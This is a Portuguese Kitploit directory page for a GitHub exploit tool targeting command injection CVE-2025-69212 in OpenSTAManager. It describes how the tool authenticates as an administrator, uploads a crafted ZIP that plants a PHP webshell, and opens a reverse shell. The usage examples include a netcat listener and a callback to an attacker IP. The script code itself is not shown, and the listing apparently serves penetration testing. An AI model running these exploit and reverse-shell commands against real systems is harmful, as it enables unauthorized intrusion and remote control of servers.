Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-69212-Exploit — Exploit automatizado para injeção de comando CVE-2025-69212 no OpenSTAManager, com autenticação de administrador, upload de ZIP malicioso e reverse shell ou execução de comandos. | Kitploit
Ferramentas/GitHubGitHub/pasindu-sd/cve-2025-69212-exploit
ExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleDesenvolvimento de Payloads
GitHubpasindu-sd/cve-2025-69212-exploit

CVE-2025-69212-Exploit

Exploit automatizado para injeção de comando CVE-2025-69212 no OpenSTAManager, com autenticação de administrador, upload de ZIP malicioso e reverse shell ou execução de comandos.

Ver Repositório
há 4 diasAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-69212 - Exploit de Injeção de Comandos P7M do OpenSTAManager

Um script de exploit totalmente automatizado para CVE-2025-69212, uma vulnerabilidade de injeção de comandos no OpenSTAManager. Este script autentica com credenciais de administrador, implanta um webshell PHP malicioso por meio de um arquivo P7M manipulado em um arquivo ZIP e fornece execução de comandos ou um reverse shell.

Recursos

  • Autenticação automatizada.
  • Geração e upload de ZIP malicioso (injeção de invoice.p7m).
  • Encapsulamento de comandos em Base64 para evitar problemas com caracteres especiais.
  • Argumentos para reverse shell e execução de comando único.

Uso

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -r <LHOST> <LPORT>

Exemplos:

Executar um único comando:

root@kitploit:~
python3 exploit.py -u http://support_001.enigma.htb -U admin -P 'Password123' -c 'id'

Obter um reverse shell:

root@kitploit:~
# Start your netcat listener in another terminal:
nc -lvnp 4444

# Run the exploit:
python3 exploit.py -u http://support_001.enigma.htb -U admin -P 'Password123' -r 10.10.14.1 4444
Baixar ferramenta